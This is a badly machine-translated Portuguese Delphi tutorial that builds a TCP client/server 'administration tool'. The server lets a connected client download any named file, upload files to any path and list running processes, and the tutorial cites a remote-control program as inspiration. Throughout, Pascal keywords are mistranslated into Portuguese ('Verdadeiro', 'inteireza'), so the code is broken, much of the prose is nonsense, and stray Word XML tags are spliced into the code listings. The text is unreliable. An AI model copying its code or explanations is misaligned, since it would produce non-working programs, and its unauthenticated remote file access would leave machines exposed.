uma abreviação para a Transmiss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e Protocolo de Protocol/Internet. O IP protocolam transações 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es e o TCP permite dois anfitriões a estabelecer uma conexã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nsferência de dados em cima daquela conexão. Nós escreveremos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 que usa este protocolo, como está seguro e facil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lement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NDO UMA APLICAÇÃO DE CLIENT/SERVE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dois exemplos de Delphi. Nós usaremos um para o Cliente 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o Servidor. Aba para sua primeira cópia de Delphi e mud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egenda de forma para Cliente de ‘'. Agora aba para a segunda cópia de Delphi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e a legenda da Forma a Servidor de ‘'. Quando eu me refiro a seu Cliente, eu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rá falando sobre a cópia de Delphi que você tem aberto com qu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trabalhando na Forma de Cliente, e vice-ver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dá uma olhada debaixo da aba de Internet de sua Paleta de Componente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verá um ClientSocket e componentes de ServerSocket [SE US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7, VEJA PÁGINA 51 PARA ATUALIZAÇÕES]. Lugar o componente de ClientSoc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sua Forma de Cliente, e o ServerSocket em sua Forma de Servidor. O deles/del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cionando não importa como eles não mostrarão em runtime–el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componentes invisíve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2 Editam caixas, 2 Botões, e um Rótulo em sua Forma. Mud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 de texto de seu Edit1 para ‘127.0.0.1 ' (seu IP local). Mudan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de Legenda de Button1 para ‘&amp;Connect ' (o ‘&amp; sinal de ' criará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alho para aquele Botão da primeira carta). Mudança Button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 para ‘&amp;Disconnect ' e muda o legenda de seu Rótulo a ‘No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conectado. Apague o texto no propriedade de Texto de seu Edit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, faça tique-taque em seu componente de ClientSocket e mude o por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 para ‘55555 ' (poderia ser qualquer porto que você deseja contanto que não fa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ja em conflito com outros números de porto, I.E–porto 80 é usado para HTTP ass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use aquele porto etc). O evento de OnClick para você Conecta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Address := Edit1.Tex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Active := Verdadeiro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nós estamos fixando o propriedade de Endereço de nosso ClientSocket com o Tex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nosso Edit1. A propriedade de Endereço é onde o IP para o que você desej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ecte iria. Secundariamente nós estamos fixando a propriedade Ativa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adeiro–quais meios que tentará conectar ao Porto e Endereç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s que nós especificam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sabemos quando nós estabelecemos uma conexão porque o OnConn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ClientSocket é incendiado. Crie o evento e ponha isto dentr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ClientSocket1Connect(Sender: TObjec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a: TCustomWinSocket)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bel1.Caption := ' Conectado! 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1.Enabled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2.Enabled := Verdadeiro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Habilitada incapacita ou habilita o componente adequad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ocê verá a runtime). Nosso Desconecte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2Click(Sender: TObjec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Active := Falso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desconectará da conexão. ClientSocket tem um ev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isconnect chamado que unsurprisingly é despedido quando nós desconectamos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ClientSocket1Disconnect(Sender: TObjec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a: TCustomWinSocket)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bel1.Caption := ' Disconnected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1.Enabled := Verdadeir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2.Enabled := Falso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para nosso Edit2. Crie um evento de OnKeyDown para isto e faç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Edit2KeyDown(Sender: TObject; var Teclam: Palavr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ca: TShiftState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(Chave = VK_RETURN)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(Edit2.Text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evento será incendiado cada tempo você aperta um tempo fundamental que você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r está na caixa de Edit2, e cada tempo conferirá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ição: se (Chave = VK_RETURN) - Isso executará o que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seu comece e termine; se a chave é VK_RETURN–que é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digo de Chave virtual para o Entre em Chave. Assim nós estamos dizendo se você aper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enquanto seu cursor estiver na caixa de Edit2, então envie o text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dit2 encaixotam ao anfitrião para o que nós somos conectados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) faz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Botão e um Rótulo em sua Forma. Fixe o Porto do ServerSoc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 para ‘55555 '–precisa ser o mesmo porto como seu Cli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e o Legenda de seu Rótulo para: ‘que não serve no momento ',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e o Legenda de seu Botão para: ‘&amp;Listen para conexões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agora crie o OnClick evento manipulador para seu Botão e faça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rSocket1.Active := Verdadeir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1.Caption := ' Escutando para conexões. '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nós estamos fixando a propriedade Ativa do ServerSocket para Retificar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e o Porto que você especificou como escutando. Isto é oposto par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riedade Ativa de ClientSocket que tentará conectar a um anfitri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um evento de OnClientRead para seu ServerSocket que s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endiou quando algo é erudito do cliente–quando recebe algu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s do cliente. Faça se parecer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ServerSocket1ClientRead(Sender: TObjec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a: TCustomWinSocket)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bel1.Caption := Socket.ReceiveText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mos nomeando há pouco a Legenda do Rótulo com Socket.ReceiveText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é um método que lê texto recebido da conex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ija, agora salve seu cliente em uma pasta de papéis separada (POR EXEMPLO: c:\client)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 em outra pasta de papéis (POR EXEMPLO: c:\server). Compile cada,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tes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não poderá conectar ao servidor a menos que esteja escutan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al você habilita clicando seu Botão. Agora você pode conectar a isto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está em seu computador ou em um computador de networked, só po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IP da máquina é em e clica Conecte. Digite algum tex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spaço em branco Edite caixa (nosso Edit2) e imprensa entra. Isto envi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para o servidor que exibirá isto usando a Legenda de Rótul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1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PRINCIP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a seção eu explicarei coisas novas como eles semeiam para cima, mas tópic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erto na seção do novato não será coberto dentro gran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alhe. Cada subtítulo conterá funcionalidade nova à que você pode acrescen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aplicação. Se lembre, eu estou há pouco lhe dando a informação aqu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m modo de como fazer coisas. Por todos os meios se expanda nisso, some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óprias idéias e programa isto para vestir suas próprias necessidad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GRAMANDO NOSSA FERRAMENTA DE ADMINISTRAÇÃO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a duas cópias de Delphi. Nós usaremos um para o trabalho no Cli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o de nossa aplicação e o outro para trabalho em nosso Servidor. Aba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rimeira cópia de Delphi e muda a legenda da Forma a Cliente de ‘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huma Conexão '. Agora aba para a segunda cópia de Delphi e mud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egenda de forma para Servidor de ‘'. Quando eu me referir a seu Cliente, eu sere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ando sobre a cópia de Delphi você têm aberto com que você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lhando na Forma de Cliente, e vice-ver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rube um componente de ClientSocket em sua Forma de Cliente e derrub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 de ServerSocket em sua Forma de Servidor. Fixe o Porto de amb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as para o porto você gostaria de sua aplicação para correr em.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ponto, economize ambas as partes de sua aplicação em dois sep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as de papé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Edite, um Memorando, e dois Botões em sua Forma. Mude o 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eu Edite a ‘IPBox ' e você poderia mudar sua Legenda ao IP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áquina você estará conectando para testando (talvez: 127.0.0.1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egenda de seu primeiro Botão deveria ser mudada a ‘&amp;Connect ' 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ndo: ‘&amp;DISCONNECT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isto em suas Formas Evento de OnCre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Clear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porque através de falta nosso Memorando terá ‘Memo1 ' escrito n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não precisamos isso exibido assim nós removeremos isto quando nossa aplica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ç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xa faça nosso Conecte Botão faça algo. Nós queremos usar exce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ando aqui com a prova ..except, porque se o usuário põe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o que não é um IP, o Windows exibirá um erro. Assim pô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em seu evento de OnClick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Address := IPBox.Text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Active := Verdadeiro; exclu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 que Conecta.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gosto da idéia de mudar para a legenda de Forma quando você conecta gos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(evento de OnConnect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1.Caption := ' o Cliente - Conexão Established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para o OnDisconnect: Form1.Caption := ' o Cliente - Nenhum Connection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também poderia acrescentar uma linha a seu Memorando se você gostar (da mesma manei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faz Tron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mente, você há pouco precisa de um modo de saber quando você conectou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onectado. Você quer seu Desconecte Botão para desconectar de f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anfitrião usando este código: ClientSocket1.Active := Fals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gostar, você poderia acrescentar uma linha ao Memorando que diz ‘Connecting..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 algo. Há pouco faça isto no ClientSocket evento de OnConnec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se seu Cliente não pode conectar ao servidor por qualquer razã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nError que evento de ClientSocket será despedido. Agora se você não t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do este evento você adquirirá a Windows mensagem caixa velha que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ira realmente evitar. Se você faz isto no evento de OnError.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: ' + IntToStr(ErrorCode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rorCode := 0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Then o que é chamado um ErrorCode será acrescentado ao invés ao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ErrorCode é há pouco um código gerado de qual o número de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 o tipo de erro que aconteceu. Fixando o ErrorCode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 como nós fizemos on-line dois, paradas o Windows erro mensagem popu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idéia é incapacitar seu Desconecte Botão (Habilitou proprieda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 para Falso) a desígnio-tempo e então habilita isto quando você conectar.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achar um exemplo disto na seção de Cliente de: CRIAND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 DE CLIENT/SERVER (SEÇÃO DE NOVATO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de fixar seu Porto de Servidor para igual a seu Porto de Cliente.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muda o ServerSocket propriedade Ativa para Retificar aqui,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time seu servidor começará serviço (escutando para conexõe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inuto você corre isto. Assim faça que e então compila cada lateral de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 e teste. OK não fará muito, mas lhe permite faz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ramente você codificou isto corretamente. Seguir são uma lista de características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incluir em sua aplicação. Os resolva na ordem deles/del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CARREGAR UM ARQUIVO DO SERVIDOR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dois Editam caixas, um Botão, e um ProgressBar em sua Forma.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achar um ProgressBar debaixo da aba de Win32 da Paleta de Compon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e (mudança a propriedade de Nome) seu primeiro Edita ‘ToDownload ' e chama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segundo Edita ‘DownloadAs '. Claro cada propriedade de Tex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ria querer pôr um par de Rótulos em sua Forma indic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Editam caixa é que. Mude o nome do ProgressBar a PBar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e o legenda de seu Botão a ‘D&amp;ownload ' (&amp; antes do o, por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já temos &amp;D). O Carregue o código de OnClick de Bot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lientSocket1.Active então {Se nós somos conectados a um anfitrião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oteFile := ToDownload.Tex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redLocalAs := DownloadAs.Tex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REQSTFILE&gt; ' + RemoteFile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declarar RemoteFile e StoredLocalAs, como glob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re variáveis. Global, porque mais tarde nós estaremos os usand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s procedimentos. A linha de SendText estará enviando algo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para o servidor: &lt;REQSTFILE&gt;c:\file.txt–eu usei c:\file.txt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xemplo, mas deveria estar claro ver que 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você não pode usar há pouco ReceiveText aqui no evento de OnClientRead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ServerSocket. Que só tem a capacidade de receber Tex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ios) - nós precisamos poder receber outros tipos de aswell de da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faz o OnClientRead evento olhar de seu ServerSocket assi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ServerSocket1ClientRead(Sender: TObjec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a: TCustomWinSocket); va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f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gLen, {A vírgula é há pouco um modo de declarar dois inteirezas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Received: inteireza; {EG: int1,int2,int3: inteireza; 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1} MsgLen := Socket.ReceiveLength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2} SetLength (Buf, MsgLen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3} LenReceived := Socket.ReceiveBuf (Buf[1], MsgLen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4} Buf := Cópia (Buf, 1, LenReceived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passarei por cada linha que corresponde de cada vez aos numerar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ntários nos que eu p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ós estamos nomeando MsgLen com a quantia de bytes pronto ser envi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cima da conexão. Nós fazemos isto usando a função de ReceiveLeng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 que ReceiveLength só é aproximado–nós poderíamos receber men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s que ReceiveLength devolve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ill vai precisar de um pára-choque (lugar em memória para armazen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s entrantes) grande bastante para armazenar os dados entrantes. Nós fazemos isto p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ando o comprimento de fio de nosso Buf pelo tamanho dos dados ist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rece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qui nós estamos usando o ReceiveBuf funcionam para ler até o segu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tia de parâmetro de bytes em Buf. O segundo parâmetro (MsgLe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 como grande o Buf é. Esta função também devolve qua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s eram realmente eruditos, assim LenReceived igualará esta quant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sto terá certeza o fio de Buf só é tão grande quanto necessá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a ReceiveLength devolveu 80 bytes aproximadamente ser enviado - então o Bu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a fixado comprimento lá a 80 por ponto 2. Nós só poderíamos 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ido 60 bytes aqui em um vá, e nosso LenReceived segurará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 de inteireza desta quantia que nós recebemos. Nós há pouco precisamos apar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 qualquer excesso comprimento de Buf com Cópia (), copiando de 1 (começand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) para o comprimento dos dados de fato recebido (LenReceive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uf ' conterá os dados que chegaram. Neste caso vai Bu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ual: &lt;REQSTFILE&gt;c:\file.txt–se havia que um ‘c:\file.txt ' digit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ToDownload Edit de nosso Cliente e nosso Carregue Botão clic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 que nós precisamos fazer são corridos um cheque naquele Buf para ver se houver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REQSTFILE&gt; em lá. Eu usei que como como uma etiqueta assim nós podemos ver isso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 quer que nós façamos. Aqui é como nós poderíamos conferi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REQSTFILE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11); {Apague a etiqueta: &lt;REQSTFILE&gt;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edFile := Buf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ClientFile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de Pos ()–devolverá número 1 se achar ‘&lt;REQSTFILE&gt; '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Buf amarram–e assim executa seu bloco de código abaixo. Agora, primeir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ue a etiqueta de nosso Buf com o qual deixará isto só o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. Então nós nomeamos uma variável de fio global (o qual você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viamente tenha que declarar) ‘RequestedFile ' com os conteúdos de Bu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ão nós chamamos um procedimento SendClientFile. Isto vai ser nosso própr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e se parecer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SendClientFile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FileSize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S: TFileStream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FileExists(RequestedFile) então {1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 := TFILESTREAM.CREATE(REQUESTEDFILE, FMOPENREAD); {2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.Position := 0; {3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FileSize := FS.Size; {4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{5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' &lt;FILEONWAY&gt; ' + INTTOSTR(THEFILESIZE) + ' |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Stream(FS); {6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clu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{7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' &lt;ERROROCRD&gt;Can não enviam. '); fim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rSocket1.Socket.Connections[0] .SendText {8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' &lt;ERROROCRD&gt;File não existe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ria olhar um pequeno amedrontando à primeira vista, mas eu tenho labell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da das declarações com um número e seguir é uma explic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ste é há pouco um modo mais curto de fazer se FileExists(RequestedFile) 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ifique então.. Assim nós estamos conferindo se o RequestedFile exis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sto é como você cria um Objeto de TFileStream. Você faz isto dentro muit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mo modo como você cria um Objeto de TMemoryStream, porém você preci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um exemplo do arquivo que você vai estar trabalhando com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ponto. Você faz isto passando o nome de arquivo como o primei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âmetro (RequestedFile em nosso caso). O próximo parâmetro reque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o de como nós vamos estar usando este arquivo. fmOpenRead está dize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queremos abrir o arquivo por só ler (nós não vamos escrev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quer coisa para este arquivo). Se você inspeciona a ajuda TFileStream.Create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achar uma lista dos outros modos que você pode us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ixando a propriedade de Posição a 0 assim nós podemos trabalhar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çando do TFileStre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FS.Size devolve o tamanho atual do nosso FS como um valor de inteirez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qui nós estamos nomeando TheFileSize com aquele valor. Note que eu ten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ado isto TheFileSize e não FileSize, porque FileSize é o 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ma função de Delphi. Tenha cuidado você não chama uma variável um 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rvado para uma rotina ou uma palavra cha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sto é como você há pouco envia texto do ServerSocket ao invés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Socket.SendText () como nós podemos fazer no lado de Cli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mos enviando algo como este fio: &lt;FILEONWAY&gt;1080 | - o q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sentido mais quando nós voltarmos a nosso lado de Cliente (em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quant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sto é como nós enviamos nosso TFileStream em cima da conexão de cov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nós não livramos o FileStream. Isto é porque o métod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Stream - livrará os dados de fluxo quando terminou envi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não esqueça nós estamos em uma prova declaração de ..except–Assim se qualquer coi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 errado e uma exceção é elevada, nós enviaremos uma mensagem de er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o Cliente (nós viremos que mais tarde o lado de Client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isto é o outro do se FileExists () condição. O progra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á dirigido fluxo a aqui se o arquivo não existi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pósito, não esqueça de declarar este procedimento como norm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ÁS PARA NOSSO LADO DE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precisamos escrever para um OnRead evento manipulador aqui para receber este arquiv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primeiro lugar, nós escreveremos alguns declarações para receber os dados com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ito em nosso evento de OnClientRead do lado de Servidor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ClientSocket1Read(Sender: TObjec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va: TCustomWinSocket); va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f: fi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sgLen,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Received: inteireza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sgLen := Socket.ReceiveLength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tLength (Buf, MsgLen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Received := Socket.ReceiveBuf (Buf[1], MsgLen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 := Cópia (Buf, 1, LenReceived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omento, eu preciso introduzir um conceito novo. Se você pensa de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e como tendo 2 estados (ou colocações): Um estado inativo, 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de arquivo receptor. No momento nosso Cliente está em um estado inativo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fazendo nada, há pouco se sentando ao redor de esperar por instrução. Quando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uma instrução do Servidor que diz que está a ponto de enviar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arquivo, precisa mudar seu estado em um estado de arquivo recep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ria pensar nisto como tendo dois interruptores, o ser de interruptor em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ção inativa - então o Servidor fala isto estará recebendo um arquiv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ssim o interruptor é sacudido na posição de arquivo receptora.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implementar este conceito de interrupt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aixo de sua seção de tipo, ponha esta linh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ClientStatus = (CSIdle, CSReceivingFile); {esta linha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Form1 = class(TForm) {logo antes aqui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em sua seção privada (variáveis globais), ponha esta declar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tate: TClientStatus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agora quer dizer que você quer fazer, quando sua aplicação começar, te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CState (estado de Cliente) jogo para estar ocioso. Acrescente esta linha a OnCre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tate := CSIdl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tendo com este conceito que terá a intenção interruptor de estar ocio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Os nomes dos estados poderiam ter sido qualquer coisa e assim pô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tate ou o tipo que nós definimos: TClientStat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olhar atrás para seu Servidor, você verá a primeira coisa que env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nós (para o Cliente) é esta linh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FILEONWAY&gt;23424 |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pus aquele número em lá como um exemplo. Na verdade s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ando o tamanho do arquivo nós pedimos. Assim o que nós precisamos faz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cheque para isto &lt;FILEONWAY&gt; etiqueta como nós fizemos no lado de Servidor. Po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em seu evento de OnRead (debaixo do código já em lá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FILEONWAY&gt; ', Buf) = 1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1} FS := TFileStream.Create(StoredLocalAs, fmCreate ou fmOpenWrit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2} TheFileSize := StrToInt (Copy(Buf, 12, Pos (' | ', Buf)-12)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3} Delete(Buf, 1, Pos (' | ', Buf)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4} PBar.Max := TheFileSiz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5} CState := CSReceivingFile; exclu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6} FS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 que carrega arquivo como ' + StoredLocalAs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declarar TheFileSize como uma variável de inteireza global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S como uma variável de TFileStream global, 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Declarações privadas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FileSize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S: TFileStrea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declaramos este global porque caso contrário cada tempo nosso evento de OnRe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chamado (que será muito), eles seriam criados (escri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ória dinâmica) que seria muita memória que escreve por nenhuma raz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amente, eu tenho referenced cada declar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ós criamos nosso TFileStream primeiramente (FS) como nosso StoredLocal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l–se lembre da variável de fio da que nós nomeamos os conteúd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a caixa de DownloadAs. Nós estamos usando os modos fmCreate de ‘ou fmOpenWrite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al se você confere que a ajuda há pouco está dizendo crie, ou se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existe, abra por escrever (assim nós escreveremos em cima dist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ós estamos nomeando a parte de tamanho do Buf então: &lt;FILEONWAY&gt;23424 |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 pedaço em tipo negrito, para TheFileSize. Nós fazemos isto por vários roti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adas como mostrado. Aqui está abaixo a fratu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ualmente Buf = ‘&lt;FILEONWAY&gt;23424 |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da Cópia () função? –Nós estamos dizendo cópia de 12 (o qual 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conta, 12 são o primeiro caráter de nosso tamanho mordeu) para o índice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| ' (o qual Pos () lucros)–12. No exemplo aqui, Pos () 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lva 17 como isso é o índice de ‘| ', co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, Cópia () cópias de um Índice então até vários cará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cificado. Assim se nós deixássemos isto assim que copiaria de 12 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contar 17 passos adiante no fio. Bem nós precisamos para men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primento de ‘&lt;FILEONWAY&gt; ' que é 11, e não esquece do ‘|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faz isto menos 12. Tão agora, o segundo parâmetro que nós estamos pass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para Copiar () é a quantia de caráter no tamanho mordeu (mordeu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negrito) de nosso f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mente, nós há pouco levamos o resultado inteiro e passamos isto a StrToInt assim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partido com um valor de inteirez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está desejando saber por que nós usamos o ‘| símbolo de ' no fim e n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faça Length(Buf) adquirir o último parâmetro de Cópia () - ist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mbora o Servidor está enviando este fio, enviando entã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s do arquivo, nós poderíamos receber este fio e um pedaço gross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e dados em um envie. Assim nós precisamos algo a referência. Aqui é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 do que nós poderíamos receber d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FILEONWAY&gt;23424|%1*01%%11*%101*1%%10 *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edaço em tipo negrito há há pouco meu modo de mostrar dados de arquivo. Você vê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receber um pedaço grosso tudo de uma vez assi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sso está fixando para o Max propriedade de nosso PBar para o tamanh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e nós estamos a ponto de receber. Se você não sabe o que um ProgressBar é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saberá quando você corre seu Cliente, assim não preocupa agora pa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gora nós fixamos nosso interruptor a CSReceivingFile (entre para em um minut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e qualquer coisa dá errado, livra o fluxo e deixou o usuário sa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que nós fixamos que nosso CState trocam a CSReceivingFile, nós precis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reva para algum código o testamento receba e escreva o arquivo. Ainda trabalh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nosso evento de OnRead de seu ClientSocket, ponha neste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CState de {1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ReceivingFile: {2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Bar.StepBy(Length(Buf)); {3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.Write(Buf[1], Length(Buf)); {4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c(TheFileSize, Length(Buf)); {5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TheFileSize = 0 então {6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State := CSIdle; {7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Bar.Position := 0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Carregou! * *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 := ''; fim; exclu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Erro que escreve arquivo. '); fim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rá agora compilar ambas as partes de sua aplicação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. Há pouco ponha o arquivo remoto você gostaria de carregar dentro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wnload Edit (POR EXEMPLO: c:\file.txt), e onde e debaixo de que nome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carregue como em seu DownloadAs Edit(E.G: c:\folder\file.txt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marquei as linhas que poderiam precisar alguns explicand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 caso declaração é amável de como um se declaração. Há pouc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zendo se é então o caso de qualquer condição debaixo disto entre ni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ições codificam blo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qui nós temos nossa condição para nosso caso declaração. Termina dentr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lon e tem um comece abaixo marcar o começo de seu bloco de códi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qui nós estamos movendo nosso PBar dependendo adiante de quantos dados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u há pouco usando o método de StepB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ós já criamos nosso TFileStream (FS) assim nós não precis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novamente. Nós há pouco precisamos escrever a isto os dados receberam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 segurará. Este é usando terminado o método de .Write. Agora você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ou nós usamos nosso Buf amarram variável como uma ordem aqu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uf[1] '–mas uma variável de fio realmente há pouco é igual uma ordem, I.E,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pôr um índice do fio entre suspensórios e pode trabalhar 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ele caráter no fio (eles não são zero fundados). Nós so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mente há pouco declaração aqui Escreve do primeiro caráter em Buf,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primento inteiro dos dados em Buf (escreva todos os dados em F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 Dec () procedimento só decrementos 1 ou um valor especific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ma variável. Aqui nós estamos especificando para menos o comprimento inteiro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s dados de Buf de TheFileSize. Nós fazemos isto para o próximo po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e lembre TheFileSize iguala o tamanho de arquivo total do arquivo que nós so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ndo. Cada tempo pelo OnRead (cada tempo nós recebemos algu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dados) nós escrevemos isto e então menos isso sobre de dados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FileSize com o Dec () procedimento em ponto 5. Aqui nós conferimos se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u todos os dados, I.E: se TheFileSize tem 0 an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nós estaremos dentro deste bloco de código quando nós recebemos todos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s assim é um lugar para bater tudo para cima. Fixe o interruptor atrás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ativo (CState := CSIdle) porque nós já não estamos recebendo um arquiv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re o TFileStream Object porque nós já não estamos trabalhando com ist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 a Posição de nosso PBar atrás ao começo, e deixe o usuár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ba carregou. Também é uma idéia boa para clarear o Buf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ória nomeando isto nada (''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uma idéia boa para incapacitar todos seus componentes enquanto um arquivo f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o transferido. Deste modo, o usuário não poderá clic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Botão ou tenta fazendo qualquer outra coisa enquanto o carregue está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esso. Tentando fazer qualquer outra coisa por exemplo: abrindo um CD-R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quanto carregando romperiam que as informações transferem e talve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e erros. Você precisaria escrever um procedimento para incapacitar todos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s e um os habilitar todo novamente, e então os chama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empo apropriado. Aqui é um exempl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DisableComponents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PBox.Enabled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Enabled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Download.Enabled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wnloadAs.Enabled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3.Enabled := Falso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você componentes novos acrescentam a seu Cliente, não esqueça dos som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procedimento de DisableComponents. Se lembre de somar um EnableComponen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epois que você escreva este procedimento claro que) chame seu evento de OnErr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well, porque se algo der errado, você não quer deixar tu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s componentes incapacita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TIQUETA DE ERR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como nosso Servidor envia ‘&lt;ERROROCRD&gt; ' quando há uma exce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vado e informa atrás que erro aconteceu–bem nós precis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a isto e exiba o erro. Aqui é nosso evento de OnRead de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ERROROCRD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11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: ' + Buf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que depois do último Pos () bloco de código, mas antes do ca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 de declaração. Isso é bem dire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m lá você tem isto - você pode carregar um arquivo do Servidor. P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do, você poderia querer mudar o propriedade Lisa de seu PBar para Retific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isso é sua cham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PARA UPLOAD UM ARQUIVO PARA O SERVIDOR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do que você precisa fazer aqui são inversos o todo carregue rotina de arquiv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caminharei brevemente de qualquer maneira por isto–lugar outro Botão em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e, sua legenda deveria ser ‘Upload ' (use o &amp; criar um atal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gosta). Lugar dois Edita em sua Forma, nomeie um ToUpload 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UploadAs. Aqui é o OnClick de seu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4Click(Sender: TObject); va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calFile: fi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: TFileStream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FileSize: inteireza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ploadingAs: fio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ClientSocket1.Active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calFile := ToUpload.Tex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ploadingAs := UploadAs.Text; se FileExists(LocalFile)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 := TFILESTREAM.CREATE(LOCALFILE, FMOPENREAD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.Position := 0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FileSize := FS2.Siz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UPLOADING&gt; ' + UPLOADINGAS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+ ' * ' + IntToStr(TheFileSize) + ' |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Lines.Add (' * * Uploading arquivam... * *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Stream(FS2); exclu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 que envia * * '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Erro: Arquivo não existe. '); fim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deixa movimento ao lado de servidor, e pôs este código dentro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ClientRead (só debaixo do último pedaço de código em lá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UPLOADING&gt; ', Buf) = 1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reAs := Copy(Buf, 12, Pos (' * ', Buf)-12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 := TFileStream.Create(StoreAs, fmCreate ou fmOpenWrit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ex1 := (Length(Buf) - Pos (' | ', Buf) )+1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gthOfSize := Length(Buf) - Pos (' * ', Buf)-Index1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Length := StrToInt(Copy(Buf, Pos (' * ', Buf)+1,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gthOfSize)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ete(Buf, 1, Pos (' | ', Buf)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State := SSReceivingFile; exclu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ket.SendText (' &lt;uploading de ERROROCRD&gt;Error arquivam.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tate := SSIdle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SState d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SReceivingFile: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.Write(Buf[1], Length(Buf)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c (DataLength, Length(Buf)); se DataLength = 0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State := SSIdl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S2.Free;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ocket.SendText (' &lt;THERESULT&gt;File Uploaded! </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">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f := ''; exclu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ket.SendText (' &lt;ERROROCRD&gt;Error que escreve arquivo.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S2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tate := SSIdle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bem parecido ao com o qual nós tivemos antes o carregue código. Há pou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par de coisas: Você precisará declarar o siga global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riáveis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State: TServerStatus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reAs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S2: TFileStrea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Length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x1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thOfSize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State é nosso interruptor que você precisará declarar no tip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como: TServerStatus = (SSIdle, SSReceivingFile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fizemos tudo isso antes. Há pouco se lembre que o initialis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re nós recebemos do Cliente que declara que nós somos aproximadamente para uplo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arquivo é algo assim: &lt;UPLOADING&gt;c:\file.txt*1231 | - Assim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ha o nome de arquivo nós somos uploading isto como, e o tamanho. Eu pus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‘* ' e o ‘| ' como para Pos () referências ao demoli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. Estes caráter foram usados como Windows não o permi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ir estes símbolos em nomes de arquiv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2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traspassarei como nós demolimos o fio e adquirimos o nome de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StoreAs e o arquivo classifique segundo o tamanho em DataLeng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Buf será inicialmente algo como (dependendo que file/size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UPLOADING&gt;c:\file.txt*1231 |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ndo o nome de arquivo de Buf e em StoreAs é bastante simples ass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passarei para entrar o tamanho na variável de DataLeng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nós precisamos determinar se há qualquer coisa segui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| '–se lembre como eu mencionei o envie poderia não estar separado–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receber um pedaço grosso dos dados de arquivo junto com nosso fio de etiqueta aqu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um vá. Nós fazemos isto para descobrir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ex1 := (Length(Buf) - Pos (' | ', Buf) )+1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x1 conterá o comprimento de qualquer dados agora depois do ‘| sinal de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é uma demonstração (eu somei a seção corajosa para um exemplo)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f = &lt;UPLOADING&gt;c:\file.txt*1231|%%*%*AbigChunkOfFileData%% *% *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primento () de nosso Buf devolveriam 57. O Pos () pedaço devolve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57–28 = 29, então some um para o ‘| ' assinam = 30 que sã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anho do pedaço em tipo negrito. Se nós não tivéssemos recebido nenhum dados de arquivo com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 de etiqueta, Index1 igualaria há pouco um (o +1 pedaço) para o ‘|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nós precisamos adquirir o comprimento atual (quantos caráter)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anho mordeu em LengthOfSize. Confirme aquela linha, eu estou seguro você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lhe fora o que vai em lá. Finalmente nós adquirimos nosso pedaço de tamanho nome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DataLength por usar Pos (), Cópia () e StrToInt (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mente, se lembre no lado de Servidor nós enviamos uma declaração de etiqueta &lt;THERESULT&gt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ocê precisará escrever algo para este igual você fez com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ERROROCRD&gt; - só acrescentar a informação a seu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Nós não usamos nosso PBar aqui para o uplo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ADQUIRIR UMA LISTA DE PROCESSOS QUE CORREM NA MÁQUIN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você poderia querer ter um Botão em seu labelled de Forma Lista de ‘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s ', ou como faz Tron, tenha um Edita caixa com que você pode digi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comando como lp de ‘' e tem uma lista de processo devolvida. Aqui é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outro Edite em sua Forma. Isto Edita vai ser nosso com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aixote como quem diz. Fixe ser CommandBox e apagar para a propriedade de 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exto na propriedade de Texto. Crie um evento de OnKeyDown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andBox e pôs neste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(Chave = VK_RETURN) então {Isto deveria estar bonito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{realmente clareie, só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Command := CommandBox.Text; {se lembre de declarar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(CommandBox.Text); {TheCommand como um habitante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andBox.Clear; {variável de fio. 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heCommand = ' lp'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Socket.SendText (' &lt;LISTPROCE&gt;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 precisará identificar a etiqueta primeiramente &lt;LISTPROCE&gt;. Pon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em seu OnClientRead (logo antes o caso bloco–bem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ria ter posto isto depois disso ou tudo que, mas eu prefiro manter ca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s ao término do evento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LISTPROCE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Processes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mos chamando uma rotina de ListProcesses aqui, o qual nós precisar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reva como segue (você precisará acrescentar ‘TLHELP32 ' a seus usos liste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ListProcesses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Handle: THandle; {Conterá uma manivela a processos correntes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Data: TProcessEntry32; {acrescente TLHELP32 a seus usos liste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OfProc: inteireza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 GetName: fio; {Como isto uma função é local para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 {este procedimento você não será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te: Byte; {chamando isto diretamente de seu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{TForm1, assim você não precisa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:= ''; {declare. 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te := 0; enquanto TheData.szExeFile[AByte] &lt;&gt; '' fa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:= Resulte + TheData.szExeFile[AByte]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(AByte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OfProcs := TStringList.Create; {Crie nosso SLOfProcs. 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LOfProcs.Count &lt;&gt; 0 então {se há qualquer cordas dentro o}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{lista, então clareie a lista. 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OfProcs.Clear; fim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1} TheHandle := CreateToolhelp32Snapshot(TH32CS_SNAPALL, 0); {2} se Process32First(TheHandle, TheData)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3} SLOfProcs.Add(GetName); {4} enquanto Process32Next(TheHandle, TheData) fa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fProcs.Add(GetName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' &lt;ERROROCRD&gt;Can não listam processos. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">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5} para NumOfProc := 0 para SLOfProcs.Count -1 faz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fProcs[NumOfProc] := ' &lt;' + IntToStr(NumOfProc) + '&gt; ' + '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 SLOfProcs[NumOfProc]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6} ServerSocket1.Socket.Connections[0] .SendTex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' &lt;PROCELIST&gt; ' + INTTOSTR(LENGTH(SLOFPROCS.TEXT)) + ' | ' +  SLOfProcs.Tex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declarar uma lista de fio global assi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fProcs: TStringList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ija, agora isso poderia parecer complicado, mas eu comentei pedaços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ado os pontos importantes. Aqui é uma lista dos pont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ós estamos nomeando nosso THandle com o do qual nós chamamos um instantâne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s de sistema correntes naquele momento. Nós estamos fazendo isto po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I chamam a uma função CreateToolhelp32Snapshot (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qui nós estamos chamando este API para recobrar o primeiro processo corr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ção. Nós passamos a manivela do instantâneo criado para isto, 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 TheData para isto. Quando nós passamos TheData como o qual nós declaramos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ProcessEntry32, nós somos amáveis de nomear informação de TheData aproximad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imeiro processo corrente. Nós estamos fazendo um se declaração qu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I funcionam Process32First devolverá Verdadeiro se um instantâneo fo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ramente criado e assim nós entraremos em seu bloco de códi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qui nós chamamos nossa função GetName que devolverá o caminho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 nomeiam da primeira corrida de processo e acrescentam isto a nosso TStringLi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qui nós damos laçada por cada processo no instantâneo e chamamos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Name para cada processo. Assim nós estamos adquirindo todo o rest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nhos de processos e nomes de arquivo em nosso TStringLi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sto está nomeando há pouco cada processo na lista um númer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sinais: &lt;&gt;. Por exemplo ' &lt;1&gt; c:\windows\notepad.exe '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o processe na lista. O segundo processo teria &lt;2&gt;...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finalmente, nós enviamos nosso TStringList contendo a lista de process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o Cliente. Nós também estamos enviando o tamanho da lista aqui assim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 saberá quando recebeu todos os da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ÁS PARA O LADO DE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um inteireza global TheSizeOfList variável. Isto será us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ermine quando nós recebemos a lista inteira. 